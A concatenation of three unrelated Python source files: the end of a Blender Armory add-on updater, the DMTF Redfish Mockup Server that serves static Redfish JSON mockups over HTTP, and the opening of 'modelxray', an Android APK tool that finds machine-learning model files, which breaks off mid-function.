restore_repo(sdk_path, 'lib/armory_tools')
restore_repo(sdk_path, 'lib/iron_format')
restore_repo(sdk_path, 'Kha')
restore_repo(sdk_path, 'Krom')
self.report({'INFO'}, 'Restored stable version')
return {"FINISHED"}
class ArmAddonHelpButton(bpy.types.Operator):
'''Updater help'''
bl_idname = "arm_addon.help"
bl_label = "Help"
bl_description = "Git is required for Armory Updater to work"
def execute(self, context):
webbrowser.open('https://armory3d.org/manual/#/dev/gitversion')
return {"FINISHED"}
@persistent
def on_load_post(context):
if ArmAddonStartButton.running:
return
bpy.ops.arm_addon.start()
def register():
bpy.utils.register_class(ArmoryAddonPreferences)
bpy.utils.register_class(ArmAddonStartButton)
bpy.utils.register_class(ArmAddonStopButton)
bpy.utils.register_class(ArmAddonUpdateButton)
bpy.utils.register_class(ArmAddonRestoreButton)
bpy.utils.register_class(ArmAddonHelpButton)
bpy.app.handlers.load_post.append(on_load_post)
def unregister():
bpy.ops.arm_addon.stop()
bpy.utils.unregister_class(ArmoryAddonPreferences)
bpy.utils.unregister_class(ArmAddonStartButton)
bpy.utils.unregister_class(ArmAddonStopButton)
bpy.utils.unregister_class(ArmAddonUpdateButton)
bpy.utils.unregister_class(ArmAddonRestoreButton)
bpy.utils.unregister_class(ArmAddonHelpButton)
bpy.app.handlers.load_post.remove(on_load_post)
if __name__ == "__main__":
register()
|
redfishMockupServer.py
|
# Copyright Notice:
# Copyright 2016-2019 DMTF. All rights reserved.
# License: BSD 3-Clause License. For full text see link: https://github.com/DMTF/Redfish-Mockup-Server/blob/master/LICENSE.md
# redfishMockupServer.py
# tested and developed Python 3.4
import sys
import argparse
import time
import collections
import json
import threading
import datetime
import grequests
import os
import ssl
import logging
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, urlunparse, parse_qs
from rfSsdpServer import RfSDDPServer
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
ch = logging.StreamHandler(sys.stdout)
ch.setLevel(logging.INFO)
logger.addHandler(ch)
tool_version = "1.0.8"
dont_send = ["connection", "keep-alive", "content-length", "transfer-encoding"]
def dict_merge(dct, merge_dct):
"""
https://gist.github.com/angstwad/bf22d1822c38a92ec0a9 modified
Recursive dict merge. Inspired by :meth:``dict.update()``, instead of
updating only top-level keys, dict_merge recurses down into dicts nested
to an arbitrary depth, updating keys. The ``merge_dct`` is merged into
``dct``.
:param dct: dict onto which the merge is executed
:param merge_dct: dct merged into dct
:return: None
"""
for k in merge_dct:
if (k in dct and isinstance(dct[k], dict) and isinstance(merge_dct[k], collections.Mapping)):
dict_merge(dct[k], merge_dct[k])
else:
dct[k] = merge_dct[k]
def clean_path(path, isShort):
"""clean_path
:param path:
:param isShort:
"""
path = path.strip('/')
path = path.split('?', 1)[0]
path = path.split('#', 1)[0]
if isShort:
path = path.replace('redfish/v1', '').strip('/')
return path
class RfMockupServer(BaseHTTPRequestHandler):
'''
returns index.json file for Serverthe specified URL
'''
patchedLinks = dict()
def construct_path(self, path, filename):
"""construct_path
:param path:
:param filename:
"""
apath = self.server.mockDir
rpath = clean_path(path, self.server.shortForm)
return '/'.join([ apath, rpath, filename ]) if filename not in ['', None] else '/'.join([ apath, rpath ])
def get_cached_link(self, path):
"""get_cached_link
:param path:
"""
if path not in self.patchedLinks:
if os.path.isfile(path):
with open(path) as f:
jsonData = json.load(f)
f.close()
else:
jsonData = None
else:
jsonData = self.patchedLinks[path]
return jsonData is not None and jsonData != '404', jsonData
def try_to_sleep(self, method, path):
"""try_to_sleep
:param method:
:param path:
"""
if self.server.timefromJson:
responseTime = self.getResponseTime(method, path)
try:
time.sleep(float(responseTime))
except ValueError as e:
logger.info("Time is not a float value. Sleeping with default response time")
time.sleep(float(self.server.responseTime))
else:
time.sleep(float(self.server.responseTime))
def send_header_file(self, fpath):
"""send_header_file
:param fpath:
"""
with open(fpath) as headers_data:
d = json.load(headers_data)
if isinstance(d.get("GET"), dict):
for k, v in d["GET"].items():
if k.lower() not in dont_send:
self.send_header(k, v)
def add_new_member(self, payload, data_received):
members = payload.get('Members')
n = 1
newpath_id = data_received.get('Id', 'Member')
newpath = '/'.join([ self.path, newpath_id ])
while newpath in [m.get('@odata.id') for m in members]:
n = n + 1
newpath_id = data_received.get('Id', 'Member') + str(n)
newpath = '/'.join([ self.path, newpath_id ])
members.append({'@odata.id': newpath})
payload['Members'] = members
payload['Members@odata.count'] = len(members)
return newpath
def handle_eventing(self, data_received):
sub_path = self.construct_path('/redfish/v1/EventService/Subscriptions', 'index.json')
success, sub_payload = self.get_cached_link(sub_path)
logger.info(sub_path)
if not success:
# Eventing not supported
return (404)
else:
# Check if all of the parameters are given
if ( ('EventType' not in data_received) or ('EventId' not in data_received) or
('EventTimestamp' not in data_received) or ('Severity' not in data_received) or
('Message' not in data_received) or ('MessageId' not in data_received) or
('MessageArgs' not in data_received) or ('OriginOfCondition' not in data_received) ):
return (400)
else:
# Need to reformat to make Origin Of Condition a proper link
origin_of_cond = data_received['OriginOfCondition']
data_received['OriginOfCondition'] = {}
data_received['OriginOfCondition']['@odata.id'] = origin_of_cond
event_payload = {}
event_payload['@odata.type'] = '#Event.v1_2_1.Event'
event_payload['Name'] = 'Test Event'
event_payload['Id'] = str(self.event_id)
event_payload['Events'] = []
event_payload['Events'].append(data_received)
# Go through each subscriber
events = []
for member in sub_payload.get('Members', []):
entry = member['@odata.id']
entrypath = self.construct_path(entry, 'index.json')
success, subscription = self.get_cached_link(entrypath)
if not success:
logger.info('No such resource')
else:
# Sanity check the subscription for required properties
if ('Destination' in subscription) and ('EventTypes' in subscription):
logger.info(('Target', subscription['Destination']))
logger.info((data_received['EventType'], subscription['EventTypes']))
# If the EventType in the request is one of interest to the subscriber, build an event payload
if data_received['EventType'] in subscription['EventTypes']:
http_headers = {}
http_headers['Content-Type'] = 'application/json'
event_payload['Context'] = subscription.get('Context', 'Default Context')
# Send the event
events.append(grequests.post(subscription['Destination'], timeout=20, data=json.dumps(event_payload), headers=http_headers))
else:
logger.info('event not in eventtypes')
try:
threading.Thread(target=grequests.map, args=(events,)).start()
except Exception as e:
logger.info('post error {}'.format( str(e)))
return (204)
self.event_id = self.event_id + 1
def handle_telemetry(self, data_received):
sub_path = self.construct_path('/redfish/v1/EventService/Subscriptions', 'index.json')
success, sub_payload = self.get_cached_link(sub_path)
logger.info(sub_path)
if not success:
# Eventing not supported
return (404)
else:
# Check if all of the parameters are given
if (('MetricReportName' in data_received) and ('MetricReportValues' in data_received)) or\
(('MetricReportName' in data_received) and ('GeneratedMetricReportValues' in data_received)) or\
(('MetricName' in data_received) and ('MetricValues' in data_received)):
# If the EventType in the request is one of interest to the subscriber, build an event payload
expected_keys = ['MetricId', 'MetricValue', 'Timestamp', 'MetricProperty', 'MetricDefinition']
other_keys = ['MetricProperty']
my_name = data_received.get('MetricName',
data_received.get('MetricReportName'))
my_data = data_received.get('MetricValues',
data_received.get('MetricReportValues',
data_received.get('GeneratedMetricReportValues')))
event_payload = {}
value_list = []
# event_payload['@Redfish.Copyright'] = 'Copyright 2014-2016 Distributed Management Task Force, Inc. (DMTF). All rights reserved.'
event_payload['@odata.context'] = '/redfish/v1/$metadata#MetricReport.MetricReport'
event_payload['@odata.type'] = '#MetricReport.v1_0_0.MetricReport'
event_payload['@odata.id'] = '/redfish/v1/TelemetryService/MetricReports/' + my_name
event_payload['Id'] = my_name
event_payload['Name'] = my_name
event_payload['MetricReportDefinition'] = {
"@odata.id": "/redfish/v1/TelemetryService/MetricReportDefinitions/" + my_name}
now = datetime.datetime.now()
event_payload['Timestamp'] = now.strftime('%Y-%m-%dT%H:%M:%S') + ('-%02d' % (now.microsecond / 10000))
for tup in my_data:
if all(x in tup for x in expected_keys):
# uncomment for stricter payload check
# ex: if all(x in expected_keys + other_keys for x in tup):
value_list.append(tup)
event_payload['MetricValues'] = value_list
logger.info(event_payload)
# construct path "mockdir/path/to/resource/<filename>"
event_fpath = self.construct_path(event_payload['@odata.id'], 'index.json')
self.patchedLinks[event_fpath] = event_payload
report_path = '/redfish/v1/TelemetryService/MetricReports'
report_path = self.construct_path(report_path, 'index.json')
success, collection_payload = self.get_cached_link(report_path)
if not success:
collection_payload = {'Members': []}
collection_payload['@odata.context'] = '/redfish/v1/$metadata#MetricReportCollection.MetricReportCollection'
collection_payload['@odata.type'] = '#MetricReportCollection.v1_0_0.MetricReportCollection'
collection_payload['@odata.id'] = '/redfish/v1/TelemetryService/MetricReports'
collection_payload['Name'] = 'MetricReports'
if event_payload['@odata.id'] not in [member.get('@odata.id') for member in collection_payload['Members']]:
collection_payload['Members'].append({'@odata.id': event_payload['@odata.id']})
collection_payload['Members@odata.count'] = len(collection_payload['Members'])
self.patchedLinks[report_path] = collection_payload
# Go through each subscriber
events = []
for member in sub_payload.get('Members', []):
entry = member['@odata.id']
entrypath = self.construct_path(entry, 'index.json')
success, subscription = self.get_cached_link(entrypath)
if not success:
logger.info('No such resource')
else:
# Sanity check the subscription for required properties
if ('Destination' in subscription) and ('EventTypes' in subscription):
logger.info(('Target', subscription['Destination']))
http_headers = {}
http_headers['Content-Type'] = 'application/json'
# Send the event
events.append(grequests.post(subscription['Destination'], timeout=20, data=json.dumps(event_payload), headers=http_headers))
else:
logger.info('event not in eventtypes')
try:
threading.Thread(target=grequests.map, args=(events,)).start()
except Exception as e:
logger.info('post error {}'.format( str(e)))
self.event_id = self.event_id + 1
return (204)
else:
return (400)
server_version = "RedfishMockupHTTPD_v" + tool_version
event_id = 1
def get_payload(self, path):
# construct path "mockdir/path/to/resource/<filename>"
fpath = self.construct_path(path, 'index.json')
success, payload = self.get_cached_link(fpath)
if success:
# If data is wrapped in a "body" key, unwrap it
body = payload.get('Body')
if body is not None:
payload = body
else:
logger.info("ERROR: Unable to get payload for {}".format(path))
return success, payload
# Respond to CORS requests; allow everything
# https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS
# https://www.html5rocks.com/static/images/cors_server_flowchart.png
def send_cors_headers(self):
# allow all CORS requests
self.send_header("Access-Control-Allow-Headers", "*")
self.send_header("Access-Control-Allow-Methods", "*")
self.send_header("Access-Control-Allow-Origin", "*")
# Headers only request
def do_HEAD(self):
"""do_HEAD"""
logger.info("Headers: ")
logger.info(self.server.headers)
# construct path "mockdir/path/to/resource/headers.json"
fpath = self.construct_path(self.path, 'index.json')
fpath_xml = self.construct_path(self.path, 'index.xml')
fpath_headers = self.construct_path(self.path, 'headers.json')
fpath_direct = self.construct_path(self.path, '')
# If bool headers is true and headers.json exists...
# else, send normal headers for given resource
if self.server.headers and (os.path.isfile(fpath_headers)):
self.send_response(200)
self.send_header_file(fpath_headers)
elif (self.server.headers is False) or (os.path.isfile(fpath_headers) is False):
if self.get_cached_link(fpath)[0]:
self.send_response(200)
self.send_header("Content-Type", "application/json")
self.send_header("OData-Version", "4.0")
elif os.path.isfile(fpath_xml) or os.path.isfile(fpath_direct):
if os.path.isfile(fpath_xml):
file_extension = 'xml'
elif os.path.isfile(fpath_direct):
filename, file_extension = os.path.splitext(fpath_direct)
file_extension = file_extension.strip('.')
self.send_response(200)
self.send_header("Content-Type", "application/" + file_extension + ";odata.metadata=minimal;charset=utf-8")
self.send_header("OData-Version", "4.0")
else:
self.send_response(404)
else:
self.send_response(404)
self.send_cors_headers()
self.end_headers()
# CORS OPTIONS requested by browser (a pre-flight request)
# https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS
def do_OPTIONS(self):
"""do_OPTIONS"""
logger.info("Options: ")
logger.info(" OPTIONS: Headers: {}".format(self.headers))
self.send_response(200)
self.send_cors_headers()
self.end_headers()
def do_GET(self):
"""do_GET"""
# for GETs always dump the request headers to the console
# there is no request data, so no need to dump that
logger.info(("GET", self.path))
logger.info(" GET: Headers: {}".format(self.headers))
# construct path "mockdir/path/to/resource/<filename>"
fpath_xml = self.construct_path(self.path, 'index.xml')
fpath_headers = self.construct_path(self.path, 'headers.json')
fpath_direct = self.construct_path(self.path, '')
success, payload = self.get_payload(self.path)
scheme, netloc, path, params, query, fragment = urlparse(self.path)
query_pieces = parse_qs(query, keep_blank_values=True)
self.try_to_sleep('GET', self.path)
# handle resource paths that don't exist for shortForm
# '/' and '/redfish'
if(self.path == '/' and self.server.shortForm):
self.send_response(404)
self.send_cors_headers()
self.end_headers()
elif(self.path in ['/redfish', '/redfish/'] and self.server.shortForm):
self.send_response(200)
if self.server.headers and (os.path.isfile(fpath_headers)):
self.send_header_file(fpath_headers)
else:
self.send_header("Content-Type", "application/json")
self.send_header("OData-Version", "4.0")
self.send_cors_headers()
self.end_headers()
self.wfile.write(json.dumps({'v1': '/redfish/v1'}, indent=4).encode())
# if this location exists in memory or as file
elif(success):
# if headers exist... send information (except for chunk info)
# end headers here (always end headers after response)
self.send_response(200)
if self.server.headers and (os.path.isfile(fpath_headers)):
self.send_header_file(fpath_headers)
else:
self.send_header("Content-Type", "application/json")
self.send_header("OData-Version", "4.0")
self.send_cors_headers()
self.end_headers()
# Strip the @Redfish.Copyright property
output_data = payload
output_data.pop("@Redfish.Copyright", None)
# Query evaluate
if output_data.get('Members') is not None:
my_members = output_data['Members']
top_count = int(query_pieces.get('$top', [str(len(my_members))])[0])
top_skip = int(query_pieces.get('$skip', ['0'])[0])
my_members = my_members[top_skip:]
if top_count < len(my_members):
my_members = my_members[:top_count]
query_out = {'$skip': top_skip + top_count, '$top': top_count}
query_string = '&'.join(['{}={}'.format(k, v) for k, v in query_out.items()])
output_data['Members@odata.nextLink'] = urlunparse(('', '', path, '', query_string, ''))
else:
pass
# Query ?$expand=[.*~]
if query_pieces.get('$expand') is not None:
my_expanded_members = []
for member in my_members:
success, member_payload = self.get_payload(member['@odata.id'])
if success:
my_expanded_members.append(member_payload)
output_data['Members'] = my_expanded_members
# logger.info("*** EXPANDED OUTPUT: {}".format(output_data))
else:
output_data['Members'] = my_members
pass
encoded_data = json.dumps(output_data, sort_keys=True, indent=4, separators=(",", ": ")).encode()
self.wfile.write(encoded_data)
# if XML...
elif(os.path.isfile(fpath_xml) or os.path.isfile(fpath_direct)):
if os.path.isfile(fpath_xml):
file_extension = 'xml'
f = open(fpath_xml, "r")
elif os.path.isfile(fpath_direct):
filename, file_extension = os.path.splitext(fpath_direct)
file_extension = file_extension.strip('.')
f = open(fpath_direct, "r")
self.send_response(200)
self.send_header("Content-Type", "application/" + file_extension + ";odata.metadata=minimal;charset=utf-8")
self.send_header("OData-Version", "4.0")
self.send_cors_headers()
self.end_headers()
self.wfile.write(f.read().encode())
f.close()
else:
self.send_response(404)
self.send_cors_headers()
self.end_headers()
def do_PATCH(self):
logger.info(" PATCH: Headers: {}".format(self.headers))
self.try_to_sleep('PATCH', self.path)
if("content-length" in self.headers):
lenn = int(self.headers["content-length"])
try:
data_received = json.loads(self.rfile.read(lenn).decode("utf-8"))
except ValueError:
print ('Decoding JSON has failed, sending 400')
data_received = None
if data_received:
logger.info(" PATCH: Data: {}".format(data_received))
# construct path "mockdir/path/to/resource/<filename>"
fpath = self.construct_path(self.path, 'index.json')
success, payload = self.get_cached_link(fpath)
# check if resource exists, otherwise 404
# if it's a file, open it, if its in memory, grab it
# 405 if Collection
# 204 if patch success
# 404 if payload DNE
# 400 if no patch payload
# end headers
if success:
# If this is a collection, throw a 405
if payload.get('Members') is not None:
self.send_response(405)
else:
# After getting resource, merge the data.
logger.info(self.headers.get('content-type'))
logger.info(data_received)
logger.info(payload)
dict_merge(payload, data_received)
logger.info(payload)
# put into self.patchedLinks
self.patchedLinks[fpath] = payload
self.send_response(204)
else:
self.send_response(404)
else:
self.send_response(400)
self.send_cors_headers()
self.end_headers()
def do_PUT(self):
logger.info(" PUT: Headers: {}".format(self.headers))
self.try_to_sleep('PUT', self.path)
if("content-length" in self.headers):
lenn = int(self.headers["content-length"])
try:
data_received = json.loads(self.rfile.read(lenn).decode("utf-8"))
except ValueError:
print ('Decoding JSON has failed, sending 400')
data_received = None
logger.info(" PUT: Data: {}".format(data_received))
# we don't support this service
# 405
# end headers
self.send_response(405)
self.send_cors_headers()
self.end_headers()
def do_POST(self):
logger.info(" POST: Headers: {}".format(self.headers))
if("content-length" in self.headers):
lenn = int(self.headers["content-length"])
try:
data_received = json.loads(self.rfile.read(lenn).decode("utf-8"))
except ValueError:
print ('Decoding JSON has failed, sending 405')
data_received = None
self.try_to_sleep('POST', self.path)
if data_received:
logger.info(" POST: Data: {}".format(data_received))
# construct path "mockdir/path/to/resource/<filename>"
fpath = self.construct_path(self.path, 'index.json')
success, payload = self.get_cached_link(fpath)
# don't bother if this item exists, otherwise, check if its an action or a file
# if file
# 405 if not Collection
# 204 if success
# 404 if no file present
if success:
if payload.get('Members') is None:
self.send_response(405)
else:
logger.info(data_received)
logger.info(type(data_received))
# with members, form unique ID
# must NOT exist in Members
# add ID to members, change count
# store as necessary in self.patchedLinks
newpath = self.add_new_member(payload, data_received)
newfpath = self.construct_path(newpath, 'index.json')
logger.info(newfpath)
self.patchedLinks[newfpath] = data_received
self.patchedLinks[fpath] = payload
self.send_response(204)
self.send_header("Location", newpath)
self.send_header("Content-Length", "0")
self.send_cors_headers()
self.end_headers()
# eventing framework
else:
if 'EventService/Actions/EventService.SubmitTestEvent' in self.path:
r_code = self.handle_eventing(data_received)
self.send_response(r_code)
elif 'TelemetryService/Actions/TelemetryService.SubmitTestMetricReport' in self.path:
r_code = self.handle_telemetry(data_received)
self.send_response(r_code)
else:
self.send_response(404)
else:
self.send_response(405)
self.send_cors_headers()
self.end_headers()
def do_DELETE(self):
"""
Delete a resource
"""
logger.info("DELETE: Headers: {}".format(self.headers))
self.try_to_sleep('DELETE', self.path)
fpath = self.construct_path(self.path, 'index.json')
ppath = '/'.join(self.path.split('/')[:-1])
parent_path = self.construct_path(ppath, 'index.json')
success, payload = self.get_cached_link(fpath)
# 404 if file doesn't exist
# 204 if success, override payload with 404
# modify payload to exclude expected URI, subtract count
# 405 if parent is not Collection
# end headers
if success:
success, parentData = self.get_cached_link(parent_path)
if success and parentData.get('Members') is not None:
self.patchedLinks[fpath] = '404'
parentData['Members'] = [x for x in parentData['Members'] if not x['@odata.id'] == self.path]
parentData['Members@odata.count'] = len(parentData['Members'])
self.patchedLinks[parent_path] = parentData
self.send_response(204)
else:
self.send_response(405)
else:
self.send_response(404)
self.send_cors_headers()
self.end_headers()
# Response time calculation Algorithm
def getResponseTime(self, method, path):
fpath = self.construct_path(path, 'time.json')
success, item = self.get_cached_link(path)
if not any(x in method for x in ("GET", "HEAD", "POST", "PATCH", "DELETE")):
logger.info("Not a valid method")
return (0)
if(os.path.isfile(fpath)):
with open(fpath) as time_data:
d = json.load(time_data)
time_str = method + "_Time"
if time_str in d:
try:
float(d[time_str])
except Exception as e:
logger.info(
"Time in the json file, not a float/int value. Reading the default time.")
return (self.server.responseTime)
return (float(d[time_str]))
else:
logger.info(('response time:', self.server.responseTime))
return (self.server.responseTime)
def main():
logger.info("Redfish Mockup Server, version {}".format(tool_version))
parser = argparse.ArgumentParser(description='Serve a static Redfish mockup.')
parser.add_argument('-H', '--host', '--Host', default='127.0.0.1',
help='hostname or IP address (default 127.0.0.1)')
parser.add_argument('-p', '--port', '--Port', default=8000, type=int,
help='host port (default 8000)')
parser.add_argument('-D', '--dir', '--Dir',
help='path to mockup dir (may be relative to CWD)')
parser.add_argument('-E', '--test-etag', '--TestEtag',
action='store_true',
help='(unimplemented) etag testing')
parser.add_argument('-X', '--headers', action='store_true',
help='load headers from headers.json files in mockup')
parser.add_argument('-t', '--time', default=0,
help='delay in seconds added to responses (float or int)')
parser.add_argument('-T', action='store_true',
help='delay response based on times in time.json files in mockup')
parser.add_argument('-s', '--ssl', action='store_true',
help='place server in SSL (HTTPS) mode; requires a cert and key')
parser.add_argument('--cert', help='the certificate for SSL')
parser.add_argument('--key', help='the key for SSL')
parser.add_argument('-S', '--short-form', '--shortForm', action='store_true',
help='apply short form to mockup (omit filepath /redfish/v1)')
parser.add_argument('-P', '--ssdp', action='store_true',
help='make mockup SSDP discoverable')
args = parser.parse_args()
hostname = args.host
port = args.port
mockDirPath = args.dir
testEtagFlag = args.test_etag
headers = args.headers
responseTime = args.time
timefromJson = args.T
sslMode = args.ssl
sslCert = args.cert
sslKey = args.key
shortForm = args.short_form
ssdpStart = args.ssdp
logger.info('Hostname: {}'.format(hostname))
logger.info('Port: {}'.format(port))
logger.info("Mockup directory path specified: {}".format(mockDirPath))
logger.info("Response time: {} seconds".format(responseTime))
# check if mockup path was specified. If not, use current working directory
if mockDirPath is None:
mockDirPath = os.getcwd()
# create the full path to the top directory holding the Mockup
mockDir = os.path.realpath(mockDirPath) # creates real full path including path for CWD to the -D<mockDir> dir path
logger.info("Serving Mockup in absolute path: {}".format(mockDir))
# check that we have a valid tall mockup--with /redfish in mockDir before proceeding
if not shortForm:
slashRedfishDir = os.path.join(mockDir, "redfish")
if os.path.isdir(slashRedfishDir) is not True:
logger.info("ERROR: Invalid Mockup Directory--no /redfish directory at top. Aborting")
sys.stderr.flush()
sys.exit(1)
if shortForm:
if os.path.isdir(mockDir) is not True or os.path.isfile(os.path.join(mockDir, "index.json")) is not True:
logger.info("ERROR: Invalid Mockup Directory--dir or index.json does not exist")
sys.stderr.flush()
sys.exit(1)
myServer = HTTPServer((hostname, port), RfMockupServer)
if sslMode:
logger.info("Using SSL with certfile: {}".format(sslCert))
myServer.socket = ssl.wrap_socket(myServer.socket, certfile=sslCert, keyfile=sslKey, server_side=True)
# save the test flag, and real path to the mockup dir for the handler to use
myServer.mockDir = mockDir
myServer.testEtagFlag = testEtagFlag
myServer.headers = headers
myServer.timefromJson = timefromJson
myServer.shortForm = shortForm
try:
myServer.responseTime = float(responseTime)
except ValueError as e:
logger.info("Enter an integer or float value")
sys.exit(2)
# myServer.me="HELLO"
mySDDP = None
if ssdpStart:
from gevent import monkey
monkey.patch_all()
# construct path "mockdir/path/to/resource/<filename>"
path, filename, jsonData = '/redfish/v1', 'index.json', None
apath = myServer.mockDir
rpath = clean_path(path, myServer.shortForm)
fpath = os.path.join(apath, rpath, filename) if filename not in ['', None] else os.path.join(apath, rpath)
if os.path.isfile(fpath):
with open(fpath) as f:
jsonData = json.load(f)
f.close()
else:
jsonData = None
protocol = '{}://'.format('https' if sslMode else 'http')
mySDDP = RfSDDPServer(jsonData, '{}{}:{}{}'.format(protocol, hostname, port, '/redfish/v1'), hostname)
logger.info("Serving Redfish mockup on port: {}".format(port))
try:
if mySDDP is not None:
t2 = threading.Thread(target=mySDDP.start)
t2.daemon = True
t2.start()
logger.info('running Server...')
myServer.serve_forever()
except KeyboardInterrupt:
pass
myServer.server_close()
logger.info("Shutting down http server")
# the below is only executed if the program is run as a script
if __name__ == "__main__":
main()
'''
TODO:
1. add -L option to load json and dump output from python dictionary
2. add authentication support -- note that in redfish some api don't require auth
3. add https support
'''
|
modelxray.py
|
#!/usr/bin/env python
import logging
import argparse
import ConfigParser
import os
import sys
import subprocess
import json
import time
from multiprocessing import Manager,Process
import progressbar
class ModelXRay:
"""
modelxray is a static Android APK analysis tool that extract all
the useful information about the machine learning model used in the App.
"""
def __init__(self, apkpath, config, args):
if args.test_only is True:
return
self._apkpath = apkpath
self._config = config
self._args = args
self._outdir = config.get("config", "output_dir")
if self._args.decomposed_package is False:
self._decdir = config.get("config", "decomposed_dir")
self._pmodels = self._outdir + "/" + "models"
self._preports = self._outdir + "/" + "reports"
self._entropy_report = []
self._is_ml_app = False
self._skip = False
self._guess_fw = None
try:
self._magic_func_list = config.get("function_pattern","magic_str").split(',')
self._max_func_num = int(config.get("config","max_func_num"))
except:
self._magic_func_list = ['init','load','model','decrypt','start','create']
self._max_func_num = 50
# get free function pattern
try:
self._free_func_list = config.get("free_pattern","magic_str").split(',')
self._free_filter_list = config.get("free_pattern","filter_str").split(',')
except:
self._free_func_list = ['free']
self._free_filter_list = ['free_exception','free_dependent_exception']
logging.debug("apkpath:" + self._apkpath)
logging.debug("outdir :" + self._outdir)
if self._args.decomposed_package is False:
logging.debug("decdir :" + self._decdir)
logging.debug("reportsdir :" + self._preports)
logging.debug("modelsdir :" + self._pmodels)
if args.decomposed_package is False:
if args.package_name is True:
self._pkgname = self.get_package_name()
else:
self._pkgname = self.get_path_base()
self._decpath = os.path.abspath(apkpath)
else:
# assume apkpath doesn't end with '/' even with '-d', if so, get rid of it
if apkpath.endswith('/'):
self._pkgname = os.path.basename(apkpath[:-1])
else:
self._pkgname = os.path.basename(apkpath)
self._respath = self._outdir + '/' + self._pkgname + '/'
self.setup_output_path()
self.setup_report()
self.setup_entropy_report()
pass
def get_path_base(self):
base = os.path.basename(self._apkpath)
if base.endswith('.apk'):
return base[:-4]
else:
return base
def setup_output_path(self):
# output dir
try:
os.stat(self._outdir)
except:
os.mkdir(self._outdir)
# decompose dir
if self._args.decomposed_package is False:
try:
os.stat(self._decdir)
except:
os.mkdir(self._decdir)
# reports dir
try:
os.stat(self._preports)
except:
os.mkdir(self._preports)
# models dir
try:
os.stat(self._pmodels)
except:
os.mkdir(self._pmodels)
def setup_entropy_report(self):
self._entropy_report_path = self._outdir + '/' + 'entropy_report'
if not os.path.exists(self._entropy_report_path):
shell_cmd = "echo 'entropy\tmd5\tsize\tpkgname\tfilename\tml_framework:library\t(entropy range(0,8), [>7.5] means random):' > %s" % self._entropy_report_path
self.run_wo(shell_cmd)
def setup_report(self):
repdir = self._outdir + '/' + self._pkgname
try:
os.stat(repdir)
except:
os.mkdir(repdir)
reppath = repdir+'/'+'report.md'
self._report = reppath
if not os.path.exists(reppath):
self._rh = open(reppath,'w')
else:
if self._args.regenerate_report is True:
logging.warning("overwriting existing report.md!")
self._skip = False
self._rh = open(reppath,'w')
else:
self._skip = True
return
self._rh.write("# Machine Learning Model Analysis Report for %s \n" % self._pkgname)
self._rh.write("\n source apk: %s \n" % self._apkpath)
pass
def run_w(self, shell_cmd):
"""
run shell cmds with result returned
"""
logging.debug("executing shell cmd : " + shell_cmd)
try:
res = os.popen(shell_cmd).read().strip()
except:
logging.error("error in executing : " + shell_cmd)
res = ""
return res
def run_wo(self, shell_cmd):
"""
run shell cmds without result returned
"""
logging.debug("executing shell cmd : " + shell_cmd)
res = subprocess.call(shell_cmd, shell=True)
if res != 0:
logging.error("error in executing cmd :" + shell_cmd)
pass
def get_package_name(self):
if self._args.decomposed_package is True:
# TODO extract package name from AndroidManifest.xml
shell_cmd = 'cat %s/AndroidManifest.xml |grep -Po \'package=\"\K[^\"]*\'' % self._apkpath
else:
# extract from apk file
shell_cmd = 'aapt d xmltree %s AndroidManifest.xml|grep package=|sed \'s/.*package=\"\([0-9a-zA-Z\.]*\)\".*/\\1/\''% self._apkpath
res = self.run_w(shell_cmd).strip()
if len(res) == 0:
logging.info("can't get the correct package name")
res = os.path.basename(self._apkpath).strip()
if len(res) == 0:
logging.error("can't get apkpath")
return "unknown_apkpath"
return res
def decompose(self, pkgname):
decpath = os.path.abspath(self._decdir+pkgname)
apkpath = os.path.abspath(self._apkpath)
self._decpath = decpath
if os.path.exists(decpath):
logging.warning(decpath + " already exists!")
else:
shell_cmd = "apktool d %s -o %s" % (apkpath, decpath)
if self._args.fast_run is True:
shell_cmd += ' --no-res --no-src'
self.run_wo(shell_cmd)
pass
def remove_decomposed_files(self):
if self._args.decomposed_package is True:
# only remove respath, but keep decomposed_path if running from decomposed_package
respath = self._respath
if not os.path.exists(respath):
logging.warning(decpath + " not exists!")
else:
shell_cmd = "rm -r %s" % (respath)
self.run_wo(shell_cmd)
else:
decpath = self._decpath
respath = self._respath
if not os.path.exists(decpath) or not os.path.exists(respath):
logging.warning(decpath + " not exists!")
else:
shell_cmd = "rm -r %s" % (decpath)
self.run_wo(shell_cmd)
shell_cmd = "rm -r %s" % (respath)
self.run_wo(shell_cmd)
pass
def ls_dir(self, dir):
filenames = []
for subdir, dirs, files in os.walk(dir):
for file in files:
filepath = os.path.join(subdir, file)
filenames.append(filepath)
return filenames
def suffix_analyzer(self, filelist):
suffix = self._config.get("model_pattern","suffix").split(',')
suffix = [sf.strip() for sf in suffix]
res = []
for f in filelist:
for suf in suffix:
if f.endswith('.'+suf.strip()):
res.append(f)
return res
def keywords_analyzer(self, filelist, config_section):
keywords = self._config.get(config_section,"keywords").split(',')
keywords = [x.strip() for x in keywords]
logging.debug("keywords:" + (','.join(keywords)))
res = []
for f in filelist:
for kw in keywords:
if f.lower().find(kw.strip()) != -1:
res.append(f)
# filter out unrelevant files that has little chance to be model file
ex_suffix = self._config.get("model_pattern","ex_suffix").split(',')
ex_suffix = [x.strip() for x in ex_suffix]
logging.debug("ex_suffix:" + ','.join(ex_suffix))
ex_res = []
for f in res:
for es in ex_suffix:
if f.endswith('.'+es.strip()):
ex_res.append(f)
final_res = []
for x in res:
if x in ex_res:
continue
else:
final_res.append(x)
return final_res
def extract_model_path(self):
# get all the filename assets/
if self._args.decomposed_package is True:
decpath = self._apkpath
else:
decpath = os.path.abspath(self._decdir+self._pkgname)
assets_path = decpath + '/' + 'assets'
self._passets = assets_path
assets_files = self.ls_dir(assets_path)
relpath = [os.path.relpath(path, assets_path) for path in assets_files]
# merge potential model files using suffix and keywords analysis
res_suf = self.suffix_analyzer(relpath)
res_kw = self.keywords_analyzer(relpath, "model_pattern")
res = list(set().union(res_suf, res_kw))
# store model path
self._models = res
# report suspected model files
self._rh.write("\n### Suspected model files under assets/:\n")
self._rh.write("entropy\t\tsize\tfilename \t(entropy(0,8), [ent >7.5] means random):\n")
#self._rh.write('\n'.join(res) + '\n')
for f in res:
ff = assets_path + '/' + f.strip()
size_cmd = "ls -sh %s"%(ff)
ent_cmd = "ent -t %s"%(ff)
md5_cmd = "md5sum %s"%(ff)
res_size = self.run_w(size_cmd)
res_ent = self.run_w(ent_cmd)
